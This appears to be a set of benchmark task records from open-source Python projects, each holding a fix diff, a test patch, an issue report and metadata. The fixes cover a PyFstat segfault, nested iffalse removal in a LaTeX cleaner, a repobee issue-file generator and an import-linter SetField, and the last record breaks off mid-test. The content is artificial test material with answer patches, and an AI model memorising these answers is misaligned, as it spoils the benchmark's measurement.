FXstatMap, timingFXstatMap = tcw.call_compute_transient_fstat_map(
self.tCWFstatMapVersion,
@@ -1987,19 +1978,10 @@ class SemiCoherentSearch(ComputeFstat):
"This function is available only if singleFstats or BSGL options were set."
)
for X in range(self.FstatResults.numDetectors):
- # For each detector, we need to build a MultiFstatAtomVector
- # because that's what the Fstat map function expects.
- singleIFOmultiFatoms = lalpulsar.CreateMultiFstatAtomVector(1)
- # The first [0] index on the multiFatoms here is over frequency bins;
+ # The [0] index on the multiFatoms here is over frequency bins;
# we always operate on a single bin.
- singleIFOmultiFatoms.data[0] = lalpulsar.CreateFstatAtomVector(
- self.FstatResults.multiFatoms[0].data[X].length
- )
- singleIFOmultiFatoms.data[0].TAtom = (
- self.FstatResults.multiFatoms[0].data[X].TAtom
- )
- singleIFOmultiFatoms.data[0].data = (
- self.FstatResults.multiFatoms[0].data[X].data
+ singleIFOmultiFatoms = utils.extract_singleIFOmultiFatoms_from_multiAtoms(
+ self.FstatResults.multiFatoms[0], X
)
FXstatMap = lalpulsar.ComputeTransientFstatMap(
multiFstatAtoms=singleIFOmultiFatoms,
diff --git a/pyfstat/utils/__init__.py b/pyfstat/utils/__init__.py
index 7230235..2161e53 100644
--- a/pyfstat/utils/__init__.py
+++ b/pyfstat/utils/__init__.py
@@ -6,6 +6,7 @@ and are of interest mostly only for developers,
but others can also be helpful for end users.
"""
+from .atoms import copy_FstatAtomVector, extract_singleIFOmultiFatoms_from_multiAtoms
from .cli import match_commandlines, run_commandline
from .converting import (
convert_aPlus_aCross_to_h0_cosi,
diff --git a/pyfstat/utils/atoms.py b/pyfstat/utils/atoms.py
new file mode 100644
index 0000000..39eb2f8
--- /dev/null
+++ b/pyfstat/utils/atoms.py
@@ -0,0 +1,69 @@
+import logging
+
+import lalpulsar
+
+logger = logging.getLogger(__name__)
+
+
+def extract_singleIFOmultiFatoms_from_multiAtoms(
+ multiAtoms: lalpulsar.MultiFstatAtomVector, X: int
+) -> lalpulsar.MultiFstatAtomVector:
+ """Extract a length-1 MultiFstatAtomVector from a larger MultiFstatAtomVector.
+
+ The result is needed as input to ``lalpulsar.ComputeTransientFstatMap`` in some places.
+
+ The new object is freshly allocated,
+ and we do a deep copy of the actual per-timestamp atoms.
+
+ Parameters
+ -------
+ multiAtoms:
+ Fully allocated multi-detector struct of `length > X`.
+ X:
+ The detector index for which to extract atoms.
+ Returns
+ -------
+ singleIFOmultiFatoms:
+ Length-1 MultiFstatAtomVector with only the data for detector `X`.
+ """
+ if X >= multiAtoms.length:
+ raise ValueError(
+ f"Detector index {X} is out of range for multiAtoms of length {multiAtoms.length}."
+ )
+ singleIFOmultiFatoms = lalpulsar.CreateMultiFstatAtomVector(1)
+ singleIFOmultiFatoms.data[0] = lalpulsar.CreateFstatAtomVector(
+ multiAtoms.data[X].length
+ )
+ # we deep-copy the entries of the atoms vector,
+ # since just assigning the whole array can cause a segfault
+ # from memory cleanup in looping over this function
+ copy_FstatAtomVector(singleIFOmultiFatoms.data[0], multiAtoms.data[X])
+ return singleIFOmultiFatoms
+
+
+def copy_FstatAtomVector(
+ dest: lalpulsar.FstatAtomVector, src: lalpulsar.FstatAtomVector
+):
+ """Deep-copy an FstatAtomVector with all its per-SFT FstatAtoms.
+
+ The two vectors must have the same length,
+ and the destination vector must already be allocated.
+
+ Parameters
+ -------
+ dest:
+ The destination vector to copy to.
+ Must already be allocated.
+ Will be modified in-place.
+ src:
+ The source vector to copy from.
+ """
+ if dest.length != src.length:
+ raise ValueError(
+ f"Lengths of destination and source vectors do not match. ({dest.length} != {src.length})"
+ )
+ dest.TAtom = src.TAtom
+ for k in range(dest.length):
+ # this is now copying the actual FstatAtom object,
+ # with its actual data in memory (no more pointers)
+ dest.data[k] = src.data[k]
|
PyFstat/PyFstat
|
c502303284fc4fba4dbe34eee1063d0f75d8b7e5
|
diff --git a/tests/test_utils/test_atoms.py b/tests/test_utils/test_atoms.py
new file mode 100644
index 0000000..a425fec
--- /dev/null
+++ b/tests/test_utils/test_atoms.py
@@ -0,0 +1,75 @@
+import lalpulsar
+import pytest
+
+from pyfstat.utils import (
+ copy_FstatAtomVector,
+ extract_singleIFOmultiFatoms_from_multiAtoms,
+)
+
+
+@pytest.fixture
+def arbitrary_singleAtoms():
+ single_atoms = lalpulsar.CreateFstatAtomVector(5)
+
+ single_atoms.TAtom = 1800
+
+ for i in range(single_atoms.length):
+
+ for attr in [
+ "timestamp",
+ "a2_alpha",
+ "b2_alpha",
+ "ab_alpha",
+ "Fa_alpha",
+ "Fb_alpha",
+ ]:
+ setattr(single_atoms.data[i], attr, i)
+
+ return single_atoms
+
+
+@pytest.fixture
+def arbitrary_multiAtoms(arbitrary_singleAtoms):
+ ma = lalpulsar.CreateMultiFstatAtomVector(1)
+ ma.data[0] = arbitrary_singleAtoms
+ return ma
+
+
+def compare_FstatAtomVector(vectorA, vectorB):
+
+ for attr in ["TAtom", "length"]:
+ assert getattr(vectorA, attr) == getattr(vectorB, attr)
+
+ for i in range(vectorA.length):
+
+ for attr in [
+ "timestamp",
+ "a2_alpha",
+ "b2_alpha",
+ "ab_alpha",
+ "Fa_alpha",
+ "Fb_alpha",
+ ]:
+ assert getattr(vectorA.data[i], attr) == getattr(vectorB.data[i], attr)
+
+
+def test_extract_singleIFOmultiFatoms_from_multiAtoms(
+ arbitrary_singleAtoms, arbitrary_multiAtoms
+):
+
+ single_atoms = extract_singleIFOmultiFatoms_from_multiAtoms(arbitrary_multiAtoms, 0)
+ compare_FstatAtomVector(single_atoms.data[0], arbitrary_multiAtoms.data[0])
+
+ with pytest.raises(ValueError):
+ extract_singleIFOmultiFatoms_from_multiAtoms(arbitrary_multiAtoms, 1)
+
+
+def test_copy_FstatAtomVector(arbitrary_singleAtoms):
+
+ single_atoms = lalpulsar.CreateFstatAtomVector(arbitrary_singleAtoms.length)
+ copy_FstatAtomVector(single_atoms, arbitrary_singleAtoms)
+ compare_FstatAtomVector(single_atoms, arbitrary_singleAtoms)
+
+ faulty_atoms = lalpulsar.CreateFstatAtomVector(arbitrary_singleAtoms.length + 1)
+ with pytest.raises(ValueError):
+ copy_FstatAtomVector(faulty_atoms, arbitrary_singleAtoms)
|
segmentation fault from BSGL grid test with recent LALSuite nightlies
**Describe the bug**
see https://github.com/PyFstat/PyFstat/actions/runs/3360239212/jobs/5569188206#step:7:104
The first failing version seems to be `7.10.1.dev20221025`.
Note that the non-BSGL `TestGridSearch::test_semicoherent_grid_search` does **not** segfault.
**Expected behavior**
no segfault
**Environment (please complete the following information):**
- see action setup, but can also reproduce locally
**To Reproduce**
```
pip install --upgrade --pre lalsuite==7.10.1.dev20221025
pytest tests/test_grid_based_searches.py::TestGridSearchBSGL::test_semicoherent_grid_search
```
**Additional context**
---
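For orientation, a minimal sketch of how the new helper from the patch above is meant to be used. `per_detector_atoms` is a made-up wrapper name, and the `ComputeTransientFstatMap` call it would feed is omitted because its other arguments are unchanged by the fix:
```python
import pyfstat.utils as utils

def per_detector_atoms(multiFatoms):
    """Hypothetical wrapper: yield a fresh length-1 MultiFstatAtomVector per detector."""
    for X in range(multiFatoms.length):
        # The new helper deep-copies the per-timestamp atoms into freshly
        # allocated memory instead of re-pointing at the shared arrays, which
        # the patch comments identify as the trigger of the segfault seen with
        # recent LALSuite nightlies.
        yield utils.extract_singleIFOmultiFatoms_from_multiAtoms(multiFatoms, X)
```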
|
0.0
|
c502303284fc4fba4dbe34eee1063d0f75d8b7e5
|
[
"tests/test_utils/test_atoms.py::test_extract_singleIFOmultiFatoms_from_multiAtoms",
"tests/test_utils/test_atoms.py::test_copy_FstatAtomVector"
] |
[] |
{
"failed_lite_validators": [
"has_added_files",
"has_many_modified_files",
"has_many_hunks"
],
"has_test_patch": true,
"is_lite": false
}
|
2022-11-01 17:07:09+00:00
|
mit
| 549
|
|
google-research__arxiv-latex-cleaner-29
|
diff --git a/arxiv_latex_cleaner/arxiv_latex_cleaner.py b/arxiv_latex_cleaner/arxiv_latex_cleaner.py
index 96dcd0c..bc12ddc 100644
--- a/arxiv_latex_cleaner/arxiv_latex_cleaner.py
+++ b/arxiv_latex_cleaner/arxiv_latex_cleaner.py
@@ -111,6 +111,36 @@ def _remove_environment(text, environment):
text)
+def _remove_iffalse_block(text):
+ """Removes possibly nested r'\iffalse*\fi' blocks from 'text'."""
+ p = re.compile(r'\\if(\w+)|\\fi')
+ level = -1
+ positions_to_del = []
+ start, end = 0, 0
+ for m in p.finditer(text):
+ if m.group() == r'\iffalse' and level == -1:
+ level += 1
+ start = m.start()
+ elif m.group().startswith(r'\if') and level >= 0:
+ level += 1
+ elif m.group() == r'\fi' and level >= 0:
+ if level == 0:
+ end = m.end()
+ positions_to_del.append((start, end))
+ level -= 1
+ else:
+ pass
+
+ for (start, end) in reversed(positions_to_del):
+ if end < len(text) and text[end].isspace():
+ end_to_del = end + 1
+ else:
+ end_to_del = end
+ text = text[:start] + text[end_to_del:]
+
+ return text
+
+
def _remove_comments_inline(text):
"""Removes the comments from the string 'text'."""
if 'auto-ignore' in text:
@@ -147,6 +177,7 @@ def _remove_comments(content, parameters):
"""Erases all LaTeX comments in the content, and writes it."""
content = [_remove_comments_inline(line) for line in content]
content = _remove_environment(''.join(content), 'comment')
+ content = _remove_iffalse_block(content)
for command in parameters['commands_to_delete']:
content = _remove_command(content, command)
return content
diff --git a/tex/main.tex b/tex/main.tex
index 2e434d5..0a9abac 100644
--- a/tex/main.tex
+++ b/tex/main.tex
@@ -15,6 +15,16 @@ This is a todo command\mytodo{Do this later}
\mytodo{This is a todo command with a nested \textit{command}.
Please remember that up to \texttt{2 levels} of \textit{nesting} are supported.}
+\newif\ifvar
+
+\ifvar
+\iffalse
+\ifvar
+Text
+\fi
+\fi
+\fi
+
\input{figures/figure_included.tex}
% \input{figures/figure_not_included.tex}
diff --git a/tex_arXiv_true/main.tex b/tex_arXiv_true/main.tex
index c3b203f..2df5b95 100644
--- a/tex_arXiv_true/main.tex
+++ b/tex_arXiv_true/main.tex
@@ -9,6 +9,11 @@ This is a percent \%.
This is a todo command
+\newif\ifvar
+
+\ifvar
+\fi
+
\input{figures/figure_included.tex}
\includegraphics{ext_tikz/test1.pdf}
|
google-research/arxiv-latex-cleaner
|
2045634c0b52bad482c9b3a0b507a7add84450e2
|
diff --git a/arxiv_latex_cleaner/tests/arxiv_latex_cleaner_test.py b/arxiv_latex_cleaner/tests/arxiv_latex_cleaner_test.py
index 0a34693..60258f1 100644
--- a/arxiv_latex_cleaner/tests/arxiv_latex_cleaner_test.py
+++ b/arxiv_latex_cleaner/tests/arxiv_latex_cleaner_test.py
@@ -88,6 +88,41 @@ class UnitTests(parameterized.TestCase):
arxiv_latex_cleaner._remove_environment(text_in, 'comment'),
true_output)
+ @parameterized.named_parameters(
+ {
+ 'testcase_name': 'no_iffalse',
+ 'text_in': 'Foo\n',
+ 'true_output': 'Foo\n'
+ }, {
+ 'testcase_name': 'if_not_removed',
+ 'text_in': '\\ifvar\n\\ifvar\nFoo\n\\fi\n\\fi\n',
+ 'true_output': '\\ifvar\n\\ifvar\nFoo\n\\fi\n\\fi\n'
+ }, {
+ 'testcase_name': 'if_removed_with_nested_ifvar',
+ 'text_in': '\\ifvar\n\\iffalse\n\\ifvar\nFoo\n\\fi\n\\fi\n\\fi\n',
+ 'true_output': '\\ifvar\n\\fi\n'
+ }, {
+ 'testcase_name': 'if_removed_with_nested_iffalse',
+ 'text_in': '\\ifvar\n\\iffalse\n\\iffalse\nFoo\n\\fi\n\\fi\n\\fi\n',
+ 'true_output': '\\ifvar\n\\fi\n'
+ }, {
+ 'testcase_name': 'if_removed_eof',
+ 'text_in': '\\iffalse\nFoo\n\\fi',
+ 'true_output': ''
+ }, {
+ 'testcase_name': 'if_removed_space',
+ 'text_in': '\\iffalse\nFoo\n\\fi ',
+ 'true_output': ''
+ }, {
+ 'testcase_name': 'if_removed_backslash',
+ 'text_in': '\\iffalse\nFoo\n\\fi\\end{document}',
+ 'true_output': '\\end{document}'
+ })
+ def test_remove_iffalse_block(self, text_in, true_output):
+ self.assertEqual(
+ arxiv_latex_cleaner._remove_iffalse_block(text_in),
+ true_output)
+
@parameterized.named_parameters(
{
'testcase_name': 'all_pass',
|
Nested \iffalse \fi block comments.
I used \iffalse ... \fi to block comment in my latex document, and used this modification of the _remove_environment command:
```
def _remove_iffalse(text):
"""Removes '\\iffalse *\\fi' from 'text'."""
"""This has problems with nested \\iffalse \\fi statements"""
return re.sub(
r'\\iffalse[\s\S]*?\\fi',
'', text)
```
However, this runs incorrectly on:
```
\iffalse
A
\iffalse
B
\fi
C
\fi
```
Which in latex outputs nothing, but with the _remove_iffalse code above outputs:
```
C
\fi
```
(I had one such nested comment in my document, because of commenting out a subsection of a section that was later commented out in its entirety.)
A similar problem does not exist for \begin{comment} \end{comment}, because
```
\begin{comment}
A
\begin{comment}
B
\end{comment}
C
\end{comment}
```
Does not compile in Latex.
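To make the failure concrete, here is a small standalone check (standard library only) that runs the non-greedy regex from the snippet above on the nested example:
```python
import re

nested = "\n".join([r"\iffalse", "A", r"\iffalse", "B", r"\fi", "C", r"\fi"])

# The non-greedy match stops at the *first* \fi, so the inner block's closing
# \fi also terminates the outer \iffalse.
print(re.sub(r'\\iffalse[\s\S]*?\\fi', '', nested))
# Prints a blank line, then "C" and a stray "\fi"; real LaTeX emits nothing,
# which is why the cleaner needs the nesting-aware scan added in this patch.
```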
|
0.0
|
2045634c0b52bad482c9b3a0b507a7add84450e2
|
[
"arxiv_latex_cleaner/tests/arxiv_latex_cleaner_test.py::UnitTests::test_remove_iffalse_block_if_not_removed",
"arxiv_latex_cleaner/tests/arxiv_latex_cleaner_test.py::UnitTests::test_remove_iffalse_block_if_removed_backslash",
"arxiv_latex_cleaner/tests/arxiv_latex_cleaner_test.py::UnitTests::test_remove_iffalse_block_if_removed_eof",
"arxiv_latex_cleaner/tests/arxiv_latex_cleaner_test.py::UnitTests::test_remove_iffalse_block_if_removed_space",
"arxiv_latex_cleaner/tests/arxiv_latex_cleaner_test.py::UnitTests::test_remove_iffalse_block_if_removed_with_nested_iffalse",
"arxiv_latex_cleaner/tests/arxiv_latex_cleaner_test.py::UnitTests::test_remove_iffalse_block_if_removed_with_nested_ifvar",
"arxiv_latex_cleaner/tests/arxiv_latex_cleaner_test.py::UnitTests::test_remove_iffalse_block_no_iffalse"
] |
[
"arxiv_latex_cleaner/tests/arxiv_latex_cleaner_test.py::UnitTests::test_keep_pattern_all_pass",
"arxiv_latex_cleaner/tests/arxiv_latex_cleaner_test.py::UnitTests::test_keep_pattern_not_all_pass",
"arxiv_latex_cleaner/tests/arxiv_latex_cleaner_test.py::UnitTests::test_remove_command_command_not_removed",
"arxiv_latex_cleaner/tests/arxiv_latex_cleaner_test.py::UnitTests::test_remove_command_command_removed",
"arxiv_latex_cleaner/tests/arxiv_latex_cleaner_test.py::UnitTests::test_remove_command_no_command",
"arxiv_latex_cleaner/tests/arxiv_latex_cleaner_test.py::UnitTests::test_remove_comments_inline_auto_ignore",
"arxiv_latex_cleaner/tests/arxiv_latex_cleaner_test.py::UnitTests::test_remove_comments_inline_comment",
"arxiv_latex_cleaner/tests/arxiv_latex_cleaner_test.py::UnitTests::test_remove_comments_inline_comment_inline",
"arxiv_latex_cleaner/tests/arxiv_latex_cleaner_test.py::UnitTests::test_remove_comments_inline_no_comment",
"arxiv_latex_cleaner/tests/arxiv_latex_cleaner_test.py::UnitTests::test_remove_comments_inline_percent",
"arxiv_latex_cleaner/tests/arxiv_latex_cleaner_test.py::UnitTests::test_remove_environment_environment_not_removed",
"arxiv_latex_cleaner/tests/arxiv_latex_cleaner_test.py::UnitTests::test_remove_environment_environment_removed",
"arxiv_latex_cleaner/tests/arxiv_latex_cleaner_test.py::UnitTests::test_remove_environment_no_environment",
"arxiv_latex_cleaner/tests/arxiv_latex_cleaner_test.py::UnitTests::test_remove_pattern_all_pass",
"arxiv_latex_cleaner/tests/arxiv_latex_cleaner_test.py::UnitTests::test_remove_pattern_not_all_pass",
"arxiv_latex_cleaner/tests/arxiv_latex_cleaner_test.py::UnitTests::test_replace_tikzpictures_no_tikz",
"arxiv_latex_cleaner/tests/arxiv_latex_cleaner_test.py::UnitTests::test_replace_tikzpictures_tikz_match",
"arxiv_latex_cleaner/tests/arxiv_latex_cleaner_test.py::UnitTests::test_replace_tikzpictures_tikz_no_match"
] |
{
"failed_lite_validators": [
"has_many_modified_files",
"has_many_hunks"
],
"has_test_patch": true,
"is_lite": false
}
|
2020-08-01 11:02:07+00:00
|
apache-2.0
| 2,561
|
|
repobee__repobee-feedback-26
|
diff --git a/repobee_feedback/_generate_multi_issues_file.py b/repobee_feedback/_generate_multi_issues_file.py
new file mode 100644
index 0000000..4f007cb
--- /dev/null
+++ b/repobee_feedback/_generate_multi_issues_file.py
@@ -0,0 +1,62 @@
+"""A helper command to automatically generate a file called issue.md
+wich contains templates of issues for multiple students assignments.
+
+.. module:: _generate_multi_issues_file
+ :synopsis: A helper command to automatically generate a file
+ called issue.md wich contains templates of issues for multiple
+ students assignments.
+
+.. moduleauthor:: Marcelo Freitas
+"""
+import pathlib
+import sys
+from typing import List
+
+import repobee_plug as plug
+from repobee_plug.cli.categorization import Action
+
+MULTI_ISSUES_FILENAME = "issue.md"
+
+GENERATE_MULTI_ISSUES_FILE_ACTION = Action(
+ name="generate-multi-issues-file",
+ category=plug.cli.CoreCommand.issues,
+)
+
+
+class GenerateMultiIssuesFile(plug.Plugin, plug.cli.Command):
+ __settings__ = plug.cli.command_settings(
+ help=(
+ "auto generate multi-issues file"
+ " for the `issues feedback` command"
+ ),
+ description="Will generate a multi-issues file template "
+ "where each pair of student assignment passed "
+ "will become an issue that starts with the line "
+ "#ISSUE#<STUDENT_REPO_NAME>#<ISSUE_TITLE>, followed by its "
+ "body. Title and body should be filled appropriately later.",
+ action=GENERATE_MULTI_ISSUES_FILE_ACTION,
+ base_parsers=[plug.BaseParser.ASSIGNMENTS, plug.BaseParser.STUDENTS],
+ )
+
+ def command(self):
+ content = _generate_multi_issues_file_content(
+ self.args.students, self.args.assignments
+ )
+
+ pathlib.Path(MULTI_ISSUES_FILENAME).write_text(
+ content, encoding=sys.getdefaultencoding()
+ )
+
+ plug.echo(f"Created multi-issues file '{MULTI_ISSUES_FILENAME}'")
+
+
+def _generate_multi_issues_file_content(
+ students: List[str], assignments: List[str]
+) -> str:
+
+ issue_headers = [
+ f"#ISSUE#{repo_name}#<ISSUE-TITLE>\n<ISSUE-BODY>"
+ for repo_name in plug.generate_repo_names(students, assignments)
+ ]
+
+ return "\n\n".join(issue_headers)
diff --git a/repobee_feedback/feedback.py b/repobee_feedback/feedback.py
index f4ceb59..cc6d488 100644
--- a/repobee_feedback/feedback.py
+++ b/repobee_feedback/feedback.py
@@ -15,6 +15,9 @@ from textwrap import indent
from typing import Iterable, Tuple, List, Mapping
import repobee_plug as plug
+from repobee_feedback._generate_multi_issues_file import ( # noqa: F401
+ GenerateMultiIssuesFile,
+)
PLUGIN_NAME = "feedback"
|
repobee/repobee-feedback
|
304e38cfcaaa1dba37dbe7bf52e37dca2387572f
|
diff --git a/tests/test_generate_multi_issues_file.py b/tests/test_generate_multi_issues_file.py
new file mode 100644
index 0000000..29b2c36
--- /dev/null
+++ b/tests/test_generate_multi_issues_file.py
@@ -0,0 +1,45 @@
+import sys
+
+import repobee
+from repobee_feedback._generate_multi_issues_file import (
+ MULTI_ISSUES_FILENAME,
+ GENERATE_MULTI_ISSUES_FILE_ACTION,
+ GenerateMultiIssuesFile,
+)
+
+
+class TestGenerateMultiIssuesFile:
+ """Tests generation of a multi-issues file"""
+
+ def test_creates_non_empty_output_file(self, tmp_path):
+ students = "alice bob".split()
+ assignments = "task-1 task-2".split()
+ command = [
+ *GENERATE_MULTI_ISSUES_FILE_ACTION.as_name_tuple(),
+ "--students",
+ *students,
+ "--assignments",
+ *assignments,
+ ]
+
+ expected_content = (
+ "#ISSUE#alice-task-1#<ISSUE-TITLE>\n"
+ "<ISSUE-BODY>\n\n"
+ "#ISSUE#bob-task-1#<ISSUE-TITLE>\n"
+ "<ISSUE-BODY>\n\n"
+ "#ISSUE#alice-task-2#<ISSUE-TITLE>\n"
+ "<ISSUE-BODY>\n\n"
+ "#ISSUE#bob-task-2#<ISSUE-TITLE>\n"
+ "<ISSUE-BODY>"
+ )
+
+ repobee.run(
+ command,
+ plugins=[GenerateMultiIssuesFile],
+ workdir=tmp_path,
+ )
+
+ outfile = tmp_path / MULTI_ISSUES_FILENAME
+ content = outfile.read_text(encoding=sys.getdefaultencoding())
+ assert outfile.is_file()
+ assert content == expected_content
|
Auto generate multi-issue file
I'm getting real tired of adding
#ISSUE#name-task-X#Pass/fail
to a file 15 times so I considered writing a plugin to do that for me but realized I can just add it to the feedback plugin if that's okay with you @slarse
I'm thinking something like:
`repobee issues feedback create-mi-file`
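For reference, the command added by the patch above ends up under the `issues` category as `generate-multi-issues-file`. A sketch of driving it from Python, mirroring the new test; the student and assignment names are invented, and the literal command strings assume the action's name tuple resolves to `("issues", "generate-multi-issues-file")`:
```python
import repobee
from repobee_feedback._generate_multi_issues_file import GenerateMultiIssuesFile

repobee.run(
    [
        "issues", "generate-multi-issues-file",
        "--students", "alice", "bob",
        "--assignments", "task-1", "task-2",
    ],
    plugins=[GenerateMultiIssuesFile],
)
# Writes issue.md with one "#ISSUE#<student>-<assignment>#<ISSUE-TITLE>" header
# per generated repo name, each followed by an "<ISSUE-BODY>" placeholder.
```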
|
0.0
|
304e38cfcaaa1dba37dbe7bf52e37dca2387572f
|
[
"tests/test_generate_multi_issues_file.py::TestGenerateMultiIssuesFile::test_creates_non_empty_output_file"
] |
[] |
{
"failed_lite_validators": [
"has_added_files"
],
"has_test_patch": true,
"is_lite": false
}
|
2021-12-21 18:27:15+00:00
|
mit
| 5,246
|
|
seddonym__import-linter-79
|
diff --git a/AUTHORS.rst b/AUTHORS.rst
index b34e861..b0fa74b 100644
--- a/AUTHORS.rst
+++ b/AUTHORS.rst
@@ -9,3 +9,4 @@ Contributors
============
* Anthony Sottile - https://github.com/asottile
+* Łukasz Skarżyński - https://github.com/skarzi
diff --git a/CHANGELOG.rst b/CHANGELOG.rst
index 49ecc2c..3df7df3 100644
--- a/CHANGELOG.rst
+++ b/CHANGELOG.rst
@@ -87,3 +87,5 @@ latest
------
* Upgrade Grimp to 1.2.2.
+* Add SetField
+* Use a SetField for ignore_imports options
diff --git a/src/importlinter/contracts/forbidden.py b/src/importlinter/contracts/forbidden.py
index 89a10de..6badb2b 100644
--- a/src/importlinter/contracts/forbidden.py
+++ b/src/importlinter/contracts/forbidden.py
@@ -14,8 +14,8 @@ class ForbiddenContract(Contract):
- source_modules: A list of Modules that should not import the forbidden modules.
- forbidden_modules: A list of Modules that should not be imported by the source modules.
- - ignore_imports: A list of DirectImports. These imports will be ignored: if the import
- would cause a contract to be broken, adding it to the list will cause
+ - ignore_imports: A set of DirectImports. These imports will be ignored: if the import
+ would cause a contract to be broken, adding it to the set will cause
the contract be kept instead. (Optional.)
"""
@@ -23,7 +23,7 @@ class ForbiddenContract(Contract):
source_modules = fields.ListField(subfield=fields.ModuleField())
forbidden_modules = fields.ListField(subfield=fields.ModuleField())
- ignore_imports = fields.ListField(subfield=fields.DirectImportField(), required=False)
+ ignore_imports = fields.SetField(subfield=fields.DirectImportField(), required=False)
def check(self, graph: ImportGraph) -> ContractCheck:
is_kept = True
diff --git a/src/importlinter/contracts/independence.py b/src/importlinter/contracts/independence.py
index 71a7ff7..14f206e 100644
--- a/src/importlinter/contracts/independence.py
+++ b/src/importlinter/contracts/independence.py
@@ -16,15 +16,15 @@ class IndependenceContract(Contract):
Configuration options:
- modules: A list of Modules that should be independent from each other.
- - ignore_imports: A list of DirectImports. These imports will be ignored: if the import
- would cause a contract to be broken, adding it to the list will cause
+ - ignore_imports: A set of DirectImports. These imports will be ignored: if the import
+ would cause a contract to be broken, adding it to the set will cause
the contract be kept instead. (Optional.)
"""
type_name = "independence"
modules = fields.ListField(subfield=fields.ModuleField())
- ignore_imports = fields.ListField(subfield=fields.DirectImportField(), required=False)
+ ignore_imports = fields.SetField(subfield=fields.DirectImportField(), required=False)
def check(self, graph: ImportGraph) -> ContractCheck:
is_kept = True
diff --git a/src/importlinter/contracts/layers.py b/src/importlinter/contracts/layers.py
index 6aa43b5..cf15223 100644
--- a/src/importlinter/contracts/layers.py
+++ b/src/importlinter/contracts/layers.py
@@ -42,8 +42,8 @@ class LayersContract(Contract):
- layers: An ordered list of layers. Each layer is the name of a module relative
to its parent package. The order is from higher to lower level layers.
- containers: A list of the parent Modules of the layers (optional).
- - ignore_imports: A list of DirectImports. These imports will be ignored: if the import
- would cause a contract to be broken, adding it to the list will cause
+ - ignore_imports: A set of DirectImports. These imports will be ignored: if the import
+ would cause a contract to be broken, adding it to the set will cause
the contract be kept instead. (Optional.)
"""
@@ -51,7 +51,7 @@ class LayersContract(Contract):
layers = fields.ListField(subfield=LayerField())
containers = fields.ListField(subfield=fields.StringField(), required=False)
- ignore_imports = fields.ListField(subfield=fields.DirectImportField(), required=False)
+ ignore_imports = fields.SetField(subfield=fields.DirectImportField(), required=False)
def check(self, graph: ImportGraph) -> ContractCheck:
is_kept = True
diff --git a/src/importlinter/domain/fields.py b/src/importlinter/domain/fields.py
index 7809113..e226ec9 100644
--- a/src/importlinter/domain/fields.py
+++ b/src/importlinter/domain/fields.py
@@ -1,16 +1,18 @@
import abc
import re
-from typing import Any, List, Union
+from typing import Generic, Iterable, List, Set, TypeVar, Union
from importlinter.domain.imports import DirectImport, Module
+FieldValue = TypeVar("FieldValue")
+
class ValidationError(Exception):
def __init__(self, message: str) -> None:
self.message = message
-class Field(abc.ABC):
+class Field(Generic[FieldValue], abc.ABC):
"""
Base class for containers for some data on a Contract.
@@ -21,7 +23,7 @@ class Field(abc.ABC):
self.required = required
@abc.abstractmethod
- def parse(self, raw_data: Union[str, List[str]]) -> Any:
+ def parse(self, raw_data: Union[str, List[str]]) -> FieldValue:
"""
Given some raw data supplied by a user, return some clean data.
@@ -42,16 +44,13 @@ class StringField(Field):
return str(raw_data)
-class ListField(Field):
+class BaseMultipleValueField(Field):
"""
- A field for multiple values of any type.
+ An abstract field for multiple values of any type.
Arguments:
- - subfield: An instance of a single-value Field. Each item in the list will be the return
- value of this subfield.
- Usage:
-
- field = ListField(subfield=AnotherField())
+ - subfield: An instance of a single-value Field. Each item in the iterable will be
+ the return value of this subfield.
"""
@@ -59,7 +58,8 @@ class ListField(Field):
super().__init__(*args, **kwargs)
self.subfield = subfield
- def parse(self, raw_data: Union[str, List]) -> List[Any]:
+ @abc.abstractmethod
+ def parse(self, raw_data: Union[str, List]) -> Iterable[FieldValue]:
if isinstance(raw_data, tuple):
raw_data = list(raw_data)
if not isinstance(raw_data, list):
@@ -70,6 +70,37 @@ class ListField(Field):
return clean_list
+class ListField(BaseMultipleValueField):
+ """
+ A field for multiple values of any type.
+
+ Fields values are returned in list sorted by parsing order.
+
+ Usage:
+
+ field = ListField(subfield=AnotherField())
+ """
+
+ def parse(self, raw_data: Union[str, List]) -> List[FieldValue]:
+ return list(super().parse(raw_data))
+
+
+class SetField(BaseMultipleValueField):
+ """
+ A field for multiple, unique values of any type.
+
+ Fields values are returned inordered in set.
+
+ Usage:
+
+ field = SetField(subfield=AnotherField())
+
+ """
+
+ def parse(self, raw_data: Union[str, List]) -> Set[FieldValue]:
+ return set(super().parse(raw_data))
+
+
class ModuleField(Field):
"""
A field for Modules.
|
seddonym/import-linter
|
334b4d1b85bae7f21f7678e5bda17af0e7487af2
|
diff --git a/tests/unit/contracts/test_forbidden.py b/tests/unit/contracts/test_forbidden.py
index 684d8eb..e69dc93 100644
--- a/tests/unit/contracts/test_forbidden.py
+++ b/tests/unit/contracts/test_forbidden.py
@@ -125,6 +125,19 @@ class TestForbiddenContract:
):
contract.check(graph=graph)
+ def test_ignore_imports_tolerates_duplicates(self):
+ graph = self._build_graph()
+ contract = self._build_contract(
+ forbidden_modules=("mypackage.blue", "mypackage.yellow"),
+ ignore_imports=(
+ "mypackage.three -> mypackage.green",
+ "mypackage.utils -> mypackage.purple",
+ "mypackage.three -> mypackage.green",
+ ),
+ include_external_packages=False,
+ )
+ assert contract.check(graph=graph)
+
def _build_graph(self):
graph = ImportGraph()
for module in (
@@ -171,7 +184,9 @@ class TestForbiddenContract:
)
return graph
- def _build_contract(self, forbidden_modules, include_external_packages=False):
+ def _build_contract(
+ self, forbidden_modules, ignore_imports=None, include_external_packages=False
+ ):
session_options = {"root_packages": ["mypackage"]}
if include_external_packages:
session_options["include_external_packages"] = "True"
@@ -182,6 +197,7 @@ class TestForbiddenContract:
contract_options={
"source_modules": ("mypackage.one", "mypackage.two", "mypackage.three"),
"forbidden_modules": forbidden_modules,
+ "ignore_imports": ignore_imports or [],
},
)
diff --git a/tests/unit/contracts/test_independence.py b/tests/unit/contracts/test_independence.py
index fefc36d..db3ba26 100644
--- a/tests/unit/contracts/test_independence.py
+++ b/tests/unit/contracts/test_independence.py
@@ -392,3 +392,30 @@ def test_missing_module():
with pytest.raises(ValueError, match=("Module 'mypackage.bar' does not exist.")):
contract.check(graph=graph)
+
+
+def test_ignore_imports_tolerates_duplicates():
+ graph = ImportGraph()
+ graph.add_module("mypackage")
+ graph.add_import(
+ importer="mypackage.a", imported="mypackage.b", line_number=1, line_contents="-"
+ )
+ graph.add_import(
+ importer="mypackage.a", imported="mypackage.c", line_number=2, line_contents="-"
+ )
+ contract = IndependenceContract(
+ name="Independence contract",
+ session_options={"root_packages": ["mypackage"]},
+ contract_options={
+ "modules": ("mypackage.a", "mypackage.b"),
+ "ignore_imports": [
+ "mypackage.a -> mypackage.b",
